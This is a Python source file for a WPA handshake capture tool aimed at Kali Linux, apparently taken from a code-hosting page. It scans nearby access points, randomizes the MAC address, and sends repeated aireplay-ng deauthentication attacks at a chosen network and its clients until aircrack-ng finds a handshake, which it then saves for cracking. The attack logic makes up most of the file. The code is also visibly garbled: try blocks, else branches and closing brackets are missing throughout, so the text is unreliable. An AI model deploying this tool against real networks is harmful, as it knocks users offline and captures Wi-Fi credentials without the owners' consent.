
353 lines
10 KiB
Executable File

import xml.etree.ElementTree as ET
import prettytable
import subprocess
import threading
import argparse
import time
import xml
import sys
import os
import re
# default values
gaps = None
TDIR = '/tmp/wcrack'
TARGS = None
'handshake': False
def she(c,debug=False):
return subprocess.check_output(c,shell=True).decode('utf8','ignore').strip()
except Exception as e:
if debug:
return None
def main():
# yes, we use a global variable
# to get the program arguments
global TARGS
parser = argparse.ArgumentParser(description='The faster WPA Handshake capturer on Kali')
parser.add_argument('--dry-run', action='store_true', help="Don't do deauth attacks, just show how it would run")
parser.add_argument('-m', '--random-mac', action='store_true', help="Randomize your MAC address at start (keeping vendor bits)")
parser.add_argument('-fa', '--force-attack', action='store_true', help="Deauths the AP before looking for connected clients")
parser.add_argument('-f', '--force', action='store_true', help='Continue on program exceptions that might ocurr, but are not critical')
parser.add_argument('-ex', '--exclude-conf', action='store_true', help="Exclude ESSIDs by regex reading /etc/spidshake/exclude.conf")
reqgroup = parser.add_argument_group('required arguments')
reqgroup.add_argument('-i','--interface', type=str, required=True, help="Interface on monitor mode to be used")
parser.add_argument('-sm','--show-max', default=12, type=int, help="Maximum Access Points to display on screen")
TARGS = parser.parse_args(sys.argv[1:])
# make the tmp dir
os.system('mkdir -p {}'.format(TDIR))
# the netxml file to read
apdata = []
nxmlfile = '{}/airodump-01.kismet.netxml'.format(TDIR)
# start dumping ap data
def render_access_points(apdata):
if len(apdata) > 0:
tb = prettytable.PrettyTable(['CH','BSSID','PW','C','#','ESSID'])
i = 0
for ap in apdata:
tb.add_row([ap['channel'], ap['bssid'][-8:], \
ap['signal'], len(ap['clients']), i, ap['essid']])
i += 1
# show aps indefinetly
li = 0
while True:
# get access point data
apdata = get_ap_data(nxmlfile)
li += 1
except KeyboardInterrupt:
# if no access points, we quit
if len(apdata) == 0:
return 0
# select the desired AP
select = 0
select = int(input('[[ Select AP index ]]: ').strip())
except ValueError:
# if index is correct, start attacking
if len(apdata) > 0 and select >= 0 and select < len(apdata):
ap_attack(nxmlfile, apdata, select)
def randomize_mac():
if TARGS.random_mac:
os.system('ifconfig {} down'.format(TARGS.interface))
# fully random macs don't usually work on deauthing, they are ignored
# so we set a fully random mac, but leaving the vendor bits unchanged
os.system('macchanger -r -e {} 2>&1 | tail -n1'.format(TARGS.interface))
os.system('ifconfig {} up'.format(TARGS.interface))
# use airodump-ng to capture all APs in
# netxml format (2.4GHZ support only, yet)
def airodump_all():
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
os.system('airodump-ng {} -a -M -w {}/airodump --write-interval 1 --band a --output-format netxml --channel 1-14 -K 1 > /dev/null 2>&1 &'\
.format(TARGS.interface, TDIR))
# use airodump-ng with bssid and channel config
# to get clients and attack easier and faster
# pcap format added to check handshakes
def airodump_bssid(bssid,channel):
# yes, we kill all airodump-ng
os.system('pkill -9 airodump-ng')
os.system('rm {}/airodump* 2>/dev/null'.format(TDIR))
airodump-ng {} --bssid {} -a -M -w {}/airodump --write-interval 1 --band a --cswitch 2 --output-format pcap,netxml --channel {} -K 1 > /dev/null 2>&1 &
""".format(TARGS.interface, bssid, TDIR, channel))
# filter ap by bssid in aps
def ap_get_by_bssid(aps, bssid):
for ap in aps:
if ap['bssid'] == bssid:
return ap
return None
# do the access point attack
def ap_attack(f, aps, index):
global thstop
global atls
hashake = False
thstop = False
thattack = None
atls = []
sap = aps[index]
# start capturing bssid traffic with specific channel
airodump_bssid(sap['bssid'], sap['channel'])
while True:
# ap index will certainly change in our implementation
# we need to search the new given aps to match bssid
ap = aps[index]
if ap['bssid'] != sap['bssid']:
ap = ap_get_by_bssid(aps, sap['bssid'])
except IndexError:
ap = ap_get_by_bssid(aps, sap['bssid'])
if ap is None:
print('FATAL: cannot retrieve AP data!')
return 1
# print the ap details and
# the connnected clients
if (TARGS.force_attack and thattack is None) or (len(ap['clients']) > 0 and thattack is None):
thattack = threading.Thread(target=ap_attack_do_clients)
print('{}; channel: {}'.format(ap['essid'], ap['channel']))
print('{}\t{}\t{}'.format(ap['bssid'], ap['signal'], ap['vendor']))
for cli in ap['clients']:
print('--¬ {}\t{}\t{}'.format(cli['mac'], cli['signal'], cli['vendor']))
# print attack info lines
for l in atls:
# check for handshake
if TVARS['handshake']:
hsfile = 'hs/handshake_{}.cap'.format(sap['essid'])
os.system('mkdir -p hs/')
os.system("cp {}/airodump-01.cap '{}'".format(TDIR, hsfile))
input('## handshake: YES / saved on {}'.format(hsfile))
TVARS['handshake'] = False
thstop = True
return 0
# sleep and re-obtain, show handshake status
print('## handshake: {}'.format('NO' if not TVARS['handshake'] else 'YES'))
aps = get_ap_data(f)
global gaps
gaps = aps
# don't know why i did this, but works?
while len(aps) == 0:
aps = get_ap_data(f)
except KeyboardInterrupt:
thstop = True
print('INFO: returing to ap listing')
# thread to attack clients and ap
# while showing them in the main thread
def ap_attack_do_clients():
global thstop
global gaps
global atls
atls = []
hashake = False
while True:
if not gaps is None and not len(gaps) == 0:
if thstop:
return 0
# explanation:
# attack n times, each n seconds
# @ An array of values
times = [
# do it all, baby
for ti in times:
gap = None
if len(gaps) == 1:
gap = gaps[0]
if gap is None:
print('FATAL: no access point or clients to attack')
return 1
randomize_mac(); time.sleep(0.5)
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} {} 2>&1 &'.format( ti[0], gap['bssid'], TARGS.interface ))
atls.append('== deauth {} broadcast => {}'.format(ti[0], gap['bssid']))
for cl in gap['clients']:
if cl['signal'] < 0:
execrt('aireplay-ng --ignore-negative-one -0 {} -a {} -c {} --deauth-rc=2 {} 2>&1 &'.format(\
ti[0], gap['bssid'], cl['mac'], TARGS.interface ))
atls.append('== deauth {} client {} {}'.format(ti[0], cl['mac'], cl['vendor']))
atls.append('== deauth client skip {} {}'.format(cl['mac'], cl['vendor']))
i = 0
while i < ti[1]:
if ap_check_has_handshake():
TVARS['handshake'] = True
return 2
if thstop:
return 0
i += 1
atls.append('FATAL: Attack did not succeed')
def execrt(cmd):
if not TARGS.dry_run:
return 'X: {}'.format(cmd)
def ap_check_has_handshake():
out = subprocess.check_output(\
"aircrack-ng {}/airodump-01.cap 2>/dev/null | grep -o -P '\d+(?=\shandshake)'".format(TDIR), shell=True)\
return int(out) > 0
except FileNotFoundError:
return False
except subprocess.CalledProcessError:
return False
# get all access point data needed (including associated clients)
def get_ap_data(f):
c = None
c = open(f,'r').read()
# sanitize xml (improper essids...)
c = re.sub(r'(?<=\&\#[^\s])\s+(?=[^\s]+;)','',c)
c = re.sub(r'\&\#[^;]+;','',c)
root = ET.fromstring(c)
except FileNotFoundError as e:
return []
except xml.etree.ElementTree.ParseError as e2:
if TARGS.force:
return []
if not str(e2).startswith('no element found'):
return []
js = []
# iterate all network access points
exclude = []
if TARGS.exclude_conf:
with open('/etc/spidshake/exclude.conf','r') as r:
exclude = r.read().strip().splitlines()
except FileNotFoundError:
exclude = []
def is_excluded(essid, exls):
for reg in exls:
if re.match(reg, essid):
return True
return False
for net in root.findall('wireless-network'):
if net.find('SSID'):
item = {
'essid': net.find('SSID').find('essid').text,
'bssid': net.find('BSSID').text,
'vendor': net.find('manuf').text,
'channel': int(net.find('channel').text),
'beacons': int(net.find('SSID').find('packets').text),
'enctypes': [it.text for it in net.find('SSID').findall('encryption')],
'signal': int(net.find('snr-info').find('last_signal_dbm').text),
'clients': [],
if len(item['enctypes']) == 1 and item['enctypes'][0] == 'None':
for cli in net.findall('wireless-client'):
client = {
'mac': cli.find('client-mac').text,
'vendor': cli.find('client-manuf').text,
'channel': int(cli.find('channel').text),
'signal': int(cli.find('snr-info').find('last_signal_dbm').text),
item['clients'] = sorted(item['clients'], key=lambda x: x['signal'], reverse=True)
if not item['essid'] is None:
if not TARGS.exclude_conf or not is_excluded(item['essid'], exclude):
# order them by signal (dBm)
js = sorted(js, key=lambda x: x['signal'], reverse=True)
if len(js) > TARGS.show_max:
return js[:TARGS.show_max]
return js
if __name__ == '__main__':
os.system('pkill -9 airodump-ng')
except KeyboardInterrupt:
print('INFO: aborted')